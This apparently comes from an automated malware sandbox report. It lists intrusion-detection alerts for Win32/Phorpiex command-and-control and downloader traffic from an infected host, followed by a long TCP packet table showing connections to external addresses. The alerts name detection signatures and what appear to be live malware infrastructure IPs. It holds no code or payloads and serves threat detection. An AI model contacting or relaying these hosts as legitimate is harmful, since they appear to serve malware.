2024-12-05T17:34:43.846973+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	2.133.70.66	40500	UDP
2024-12-05T17:34:44.421681+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50055	91.202.233.141	80	TCP
2024-12-05T17:34:44.421681+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50055	91.202.233.141	80	TCP
2024-12-05T17:34:48.157586+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50057	91.202.233.141	80	TCP
2024-12-05T17:34:48.157586+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50057	91.202.233.141	80	TCP
2024-12-05T17:34:48.870685+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	5.76.0.203	40500	UDP
2024-12-05T17:34:52.510546+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50059	91.202.233.141	80	TCP
2024-12-05T17:34:52.510546+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50059	91.202.233.141	80	TCP
2024-12-05T17:34:54.015756+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	109.68.122.14	40500	UDP
2024-12-05T17:34:58.674738+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50061	185.215.113.66	80	TCP
2024-12-05T17:34:58.674738+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50061	185.215.113.66	80	TCP
2024-12-05T17:35:02.360041+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50063	185.215.113.66	80	TCP
2024-12-05T17:35:02.360041+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50063	185.215.113.66	80	TCP
2024-12-05T17:35:06.198040+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50064	185.215.113.66	80	TCP
2024-12-05T17:35:06.198040+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50064	185.215.113.66	80	TCP
2024-12-05T17:35:09.510773+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	189.167.22.36	40500	UDP
2024-12-05T17:35:09.837541+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50066	185.215.113.66	80	TCP
2024-12-05T17:35:09.837541+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50066	185.215.113.66	80	TCP
2024-12-05T17:35:13.491459+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50068	185.215.113.66	80	TCP
2024-12-05T17:35:13.491459+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50068	185.215.113.66	80	TCP
2024-12-05T17:35:18.167455+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50070	91.202.233.141	80	TCP
2024-12-05T17:35:18.167455+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50070	91.202.233.141	80	TCP
2024-12-05T17:35:19.548640+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	212.13.170.223	40500	UDP
2024-12-05T17:35:21.797150+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50071	91.202.233.141	80	TCP
2024-12-05T17:35:21.797150+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50071	91.202.233.141	80	TCP
2024-12-05T17:35:24.568299+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	89.249.62.7	40500	UDP
2024-12-05T17:35:25.411308+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50073	91.202.233.141	80	TCP
2024-12-05T17:35:25.411308+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50073	91.202.233.141	80	TCP
2024-12-05T17:35:29.061048+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50075	91.202.233.141	80	TCP
2024-12-05T17:35:29.061048+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50075	91.202.233.141	80	TCP
2024-12-05T17:35:32.740048+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50077	91.202.233.141	80	TCP
2024-12-05T17:35:32.740048+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50077	91.202.233.141	80	TCP
2024-12-05T17:35:34.608881+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	46.248.34.12	40500	UDP
2024-12-05T17:35:37.820344+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50078	185.215.113.66	80	TCP
2024-12-05T17:35:37.820344+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50078	185.215.113.66	80	TCP
2024-12-05T17:35:41.796669+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50080	185.215.113.66	80	TCP
2024-12-05T17:35:41.796669+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50080	185.215.113.66	80	TCP
2024-12-05T17:35:45.373070+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50082	185.215.113.66	80	TCP
2024-12-05T17:35:45.373070+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50082	185.215.113.66	80	TCP
2024-12-05T17:35:48.870959+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50084	185.215.113.66	80	TCP
2024-12-05T17:35:48.870959+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50084	185.215.113.66	80	TCP
2024-12-05T17:35:49.628423+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	2.180.115.76	40500	UDP
2024-12-05T17:35:52.381305+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50085	185.215.113.66	80	TCP
2024-12-05T17:35:52.381305+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50085	185.215.113.66	80	TCP
2024-12-05T17:35:56.905546+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50087	91.202.233.141	80	TCP
2024-12-05T17:35:56.905546+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50087	91.202.233.141	80	TCP
2024-12-05T17:35:59.643983+0100	2044077	ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC	1	192.168.2.11	62307	178.253.102.214	40500	UDP
2024-12-05T17:36:00.434999+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.11	50089	91.202.233.141	80	TCP
2024-12-05T17:36:00.434999+0100	2848295	ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3	1	192.168.2.11	50089	91.202.233.141	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 5, 2024 17:31:38.952404022 CET	49710	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:39.072244883 CET	80	49710	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:39.076081038 CET	49710	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:39.088346958 CET	49710	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:39.208208084 CET	80	49710	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:40.486912966 CET	80	49710	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:40.486928940 CET	80	49710	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:40.487004042 CET	49710	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:40.488637924 CET	80	49710	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:40.488673925 CET	49710	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:40.488686085 CET	80	49710	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:40.488697052 CET	80	49710	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:40.488734007 CET	49710	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:40.490406990 CET	80	49710	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:40.490442991 CET	49710	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:40.490453959 CET	80	49710	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:40.490464926 CET	80	49710	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:40.490499973 CET	49710	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:40.490514994 CET	49710	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:40.491444111 CET	80	49710	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:40.491481066 CET	49710	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:40.491530895 CET	80	49710	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:40.491569042 CET	49710	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:40.606827021 CET	80	49710	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:40.606888056 CET	49710	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:40.702573061 CET	80	49710	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:40.702647924 CET	49710	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:43.601325989 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:43.721729994 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:43.721796036 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:43.727128029 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:43.846833944 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:44.084194899 CET	49710	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.063201904 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.063225985 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.063425064 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.064635038 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.064647913 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.064659119 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.064754963 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.064754963 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.065449953 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.065504074 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.065504074 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.065515995 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.065545082 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.065588951 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.069541931 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.069601059 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.069633961 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.069706917 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.183346987 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.183602095 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.183610916 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.183676004 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.187541962 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.187638998 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.190068960 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.190084934 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.190128088 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.190188885 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.256721973 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.256799936 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.256933928 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.257118940 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.261029005 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.261090040 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.261271954 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.261337042 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.269462109 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.269501925 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.269594908 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.277729034 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.277815104 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.277836084 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.277872086 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.286227942 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.286304951 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.286366940 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.295059919 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.295130014 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.295218945 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.295264959 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.303491116 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.303510904 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.303586006 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.312494040 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.312514067 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.312566042 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.312639952 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.320086002 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.320209980 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.320256948 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.320305109 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.328099012 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.328155994 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.328203917 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.328247070 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.335966110 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.339631081 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.426259995 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.426276922 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.426346064 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.426346064 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.430284023 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.430351019 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.451741934 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.451858044 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.451988935 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.452002048 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.452054024 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.452254057 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.452317953 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.455959082 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.456254959 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.456334114 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.460587025 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.460684061 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.460793972 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.460848093 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.465240002 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.465303898 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.465411901 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.465467930 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.469625950 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.469723940 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.469782114 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.469899893 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.474396944 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.474411011 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.474477053 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.478708982 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.478759050 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.478868961 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.479228973 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.483330965 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.483345032 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.483504057 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.489553928 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.489711046 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.489765882 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.492392063 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.492475033 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.492532969 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.492577076 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.496423006 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.496500015 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.496536970 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.496613026 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.500940084 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.501055002 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.501107931 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.501162052 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.505547047 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.505610943 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.505670071 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.505731106 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.510107040 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.510164022 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.510171890 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.510204077 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.514507055 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.514583111 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.514642000 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.514684916 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:45.518999100 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:45.522031069 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:47.909708023 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:48.031405926 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:52.642520905 CET	80	49721	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:52.642676115 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:52.731421947 CET	49721	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:54.706743956 CET	49747	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:54.826596022 CET	80	49747	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:54.826698065 CET	49747	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:54.827510118 CET	49747	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:54.947967052 CET	80	49747	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:56.247548103 CET	80	49747	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:56.247575998 CET	80	49747	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:56.247587919 CET	80	49747	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:56.247601032 CET	80	49747	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:56.247687101 CET	80	49747	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:56.247698069 CET	49747	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:56.247700930 CET	80	49747	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:56.247714043 CET	80	49747	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:56.247742891 CET	80	49747	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:56.247745037 CET	49747	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:56.247756004 CET	80	49747	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:56.247766018 CET	49747	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:56.247800112 CET	49747	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:56.249672890 CET	49747	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:56.249700069 CET	49747	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:57.444011927 CET	49756	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:57.777990103 CET	80	49756	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:57.778076887 CET	49756	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:57.788091898 CET	49756	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:57.908111095 CET	80	49756	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:57.996937037 CET	49757	40500	192.168.2.11	109.68.122.14
Dec 5, 2024 17:31:58.116940022 CET	40500	49757	109.68.122.14	192.168.2.11
Dec 5, 2024 17:31:58.117024899 CET	49757	40500	192.168.2.11	109.68.122.14
Dec 5, 2024 17:31:58.118590117 CET	49757	40500	192.168.2.11	109.68.122.14
Dec 5, 2024 17:31:58.238374949 CET	40500	49757	109.68.122.14	192.168.2.11
Dec 5, 2024 17:31:58.238445997 CET	49757	40500	192.168.2.11	109.68.122.14
Dec 5, 2024 17:31:58.360486984 CET	40500	49757	109.68.122.14	192.168.2.11
Dec 5, 2024 17:31:59.111695051 CET	80	49756	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:59.111733913 CET	80	49756	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:59.111763000 CET	49756	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:59.111851931 CET	49756	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:59.114202976 CET	80	49756	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:59.114213943 CET	80	49756	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:59.114226103 CET	80	49756	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:59.114238977 CET	80	49756	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:59.114283085 CET	49756	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:59.114326954 CET	49756	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:59.116379976 CET	80	49756	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:59.116414070 CET	80	49756	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:59.116424084 CET	80	49756	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:59.116466999 CET	49756	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:59.119033098 CET	80	49756	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:59.119076014 CET	49756	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:59.231987953 CET	80	49756	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:59.232006073 CET	80	49756	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:59.232064009 CET	49756	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:31:59.308490038 CET	80	49756	185.215.113.66	192.168.2.11
Dec 5, 2024 17:31:59.309979916 CET	49756	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:03.585376978 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:03.705156088 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:03.705373049 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:03.706990004 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:03.827949047 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:04.410579920 CET	49756	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:04.530610085 CET	80	49756	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:04.848979950 CET	80	49756	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:04.849004984 CET	80	49756	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:04.849116087 CET	49756	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:04.849909067 CET	49756	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:04.849944115 CET	49756	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:04.850928068 CET	80	49756	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:04.851001978 CET	49756	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:04.851035118 CET	80	49756	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:04.851077080 CET	49756	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:04.858670950 CET	80	49756	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:04.858736038 CET	49756	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:04.858769894 CET	80	49756	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:04.858808994 CET	49756	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:04.866307974 CET	80	49756	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:04.866386890 CET	80	49756	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:04.866393089 CET	49756	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:04.866416931 CET	49756	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:04.873976946 CET	80	49756	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:04.874046087 CET	49756	80	192.168.2.11	185.215.113.66
